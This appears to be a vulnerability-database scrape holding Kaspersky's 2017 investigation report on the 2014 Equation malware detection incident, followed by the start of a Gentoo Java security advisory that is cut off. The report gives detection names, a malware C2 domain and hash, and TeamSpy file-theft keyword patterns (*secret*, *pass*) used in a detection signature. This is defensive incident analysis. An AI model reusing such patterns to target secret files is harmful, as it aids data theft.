"CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. Was there actually classified information found on the system inadvertently?\n 5. If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as a food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 \nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\" was removed from storage. Based on description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold; We don't need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts which are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of \"Office-2013-PPVL-x64-en-US-Oct2013.iso\". What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic \nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx \nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw \nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr \nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan \nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg \nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. \u2013 statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6 \u2013 **Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6 - **The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We asses this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given that system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend to check the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string pattern based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox processed sample. In addition, the malware analyst included another indicator to avoid false positives; A path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is a possibility that an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.\n\n[ **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2418", "CVE-2012-5089", "CVE-2013-2431", "CVE-2013-2468", "CVE-2013-2420", "CVE-2013-5889", "CVE-2013-2384", "CVE-2013-2415", "CVE-2013-5848", "CVE-2012-1711", "CVE-2013-1491", "CVE-2013-1571", "CVE-2013-5782", "CVE-2013-5846", "CVE-2012-1541", "CVE-2013-2417", "CVE-2013-0402", "CVE-2013-5818", "CVE-2013-2433", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-2416", "CVE-2013-2427", "CVE-2013-0401", "CVE-2012-5074", "CVE-2012-5073", "CVE-2012-1725", "CVE-2014-0385", "CVE-2013-2424", "CVE-2013-5878", "CVE-2013-5850", "CVE-2013-2407", "CVE-2012-1533", "CVE-2013-5778", "CVE-2013-2456", "CVE-2013-0448", "CVE-2014-0410", "CVE-2013-2436", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-1485", "CVE-2013-1479", "CVE-2013-2462", "CVE-2013-0169", "CVE-2014-0415", "CVE-2013-2414", "CVE-2012-1719", "CVE-2013-2394", "CVE-2011-3563", "CVE-2013-5870", "CVE-2013-2421", "CVE-2012-3159", "CVE-2013-1518", "CVE-2013-5776", "CVE-2012-5087", "CVE-2013-5788", "CVE-2013-5905", "CVE-2013-0809", "CVE-2013-5904", "CVE-2013-5888", "CVE-2013-2452", "CVE-2012-3342", "CVE-2013-2451", "CVE-2013-5893", "CVE-2013-5842", "CVE-2014-0387", "CVE-2012-5085", "CVE-2012-5076", "CVE-2013-5810", "CVE-2013-5830", "CVE-2013-2473", "CVE-2012-5079", "CVE-2012-4416", "CVE-2013-5898", "CVE-2012-0507", "CVE-2012-5075", "CVE-2013-1473", "CVE-2013-5832", "CVE-2012-3136", "CVE-2013-1488", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2014-0375", "CVE-2012-5081", "CVE-2012-5067", "CVE-2013-5817", "CVE-2012-0503", "CVE-2012-3174", "CVE-2011-5035", "CVE-2013-2419", "CVE-2012-1723", "CVE-2013-2463", "CVE-2013-1563", "CVE-2013-2469", "CVE-2013-5787", "CVE-2013-5852", "CVE-2012-1726", "CVE-2014-0418", "CVE-2013-0351", "CVE-2013-2465", "CVE-2014-0373", "CVE-2013-1537", "CVE-2013-3743", "CVE-2013-5854", "CVE-2012-0498", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5887", "CVE-2012-0506", "CVE-2014-0408", "CVE-2013-5825", "CVE-2012-1717", "CVE-2012-1721", "CVE-2014-0376", "CVE-2013-2423", "CVE-2014-0422", "CVE-2013-5789", "CVE-2014-0411", "CVE-2013-2439", "CVE-2013-1561", "CVE-2013-5823", "CVE-2013-0409", "CVE-2013-5895", "CVE-2013-0438", "CVE-2012-1713", "CVE-2013-2461", "CVE-2012-1716", "CVE-2013-2428", "CVE-2012-5083", "CVE-2013-5843", "CVE-2012-5088", "CVE-2013-5899", "CVE-2013-2429", "CVE-2013-5812", "CVE-2013-5849", "CVE-2012-5086", "CVE-2013-5896", "CVE-2013-2471", "CVE-2012-0497", "CVE-2012-1532", "CVE-2012-5077", "CVE-2013-1486", "CVE-2014-0417", "CVE-2013-5780", "CVE-2013-5910", "CVE-2013-1487", "CVE-2013-5906", "CVE-2013-0430", "CVE-2013-0445", "CVE-2012-5069", "CVE-2014-0428", "CVE-2012-3216", "CVE-2014-0382", "CVE-2012-0505", "CVE-2013-5824", "CVE-2012-5084", "CVE-2013-5831", "CVE-2012-1718", "CVE-2013-2440", "CVE-2013-2434", "CVE-2013-2464", "CVE-2013-2458", "CVE-2012-3213", "CVE-2013-2459", "CVE-2012-5071", "CVE-2013-5814", "CVE-2013-2442", "CVE-2012-0499", "CVE-2012-0501", "CVE-2013-0446", "CVE-2013-2432", "CVE-2012-1722", "CVE-2014-0368", "CVE-2013-2443", "CVE-2014-0423", "CVE-2013-1481", "CVE-2013-5775", "CVE-2013-2446", "CVE-2012-0547", "CVE-2013-5829", "CVE-2013-5803", "CVE-2012-5072", "CVE-2013-2450", "CVE-2013-2400", "CVE-2013-2472", "CVE-2013-2438", "CVE-2013-1540", "CVE-2012-0500", "CVE-2013-2467", "CVE-2013-5907", "CVE-2013-1493", "CVE-2013-5902", "CVE-2012-1531", "CVE-2013-2444", "CVE-2013-3744", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-5844", "CVE-2013-0437", "CVE-2012-4681", "CVE-2013-2437", "CVE-2013-2453", "CVE-2013-1557", "CVE-2012-0504", "CVE-2013-2426", "CVE-2014-0424", "CVE-2013-2455", "CVE-2013-5819", "CVE-2013-2422", "CVE-2013-2435", "CVE-2013-2383", "CVE-2013-1484", "CVE-2013-1564", "CVE-2013-1558", "CVE-2013-5774", "CVE-2012-1724", "CVE-2013-0422", "CVE-2012-5068", "CVE-2014-0403", "CVE-2013-3829", "CVE-2012-1682", "CVE-2012-3143", "CVE-2012-0502", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-2425", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-1569", "CVE-2013-5838", "CVE-2013-2412", "CVE-2013-0449", "CVE-2013-2445", "CVE-2013-2430", "CVE-2013-2460", "CVE-2013-5840", "CVE-2013-5801", "CVE-2014-0416", "CVE-2013-2449", "CVE-2013-2466", "CVE-2012-5070", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-0423", "CVE-2013-5772", "CVE-2013-0419"], "description": "### Background\n\nThe Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE) provide the Oracle Java platform (formerly known as Sun Java Platform). \n\n### Description\n\nMultiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jdk-bin-1.7.0.51\"\n \n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jre-bin-1.7.0.51\"\n \n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/emul-linux-x86-java-1.7.0.51\"\n \n\nAll 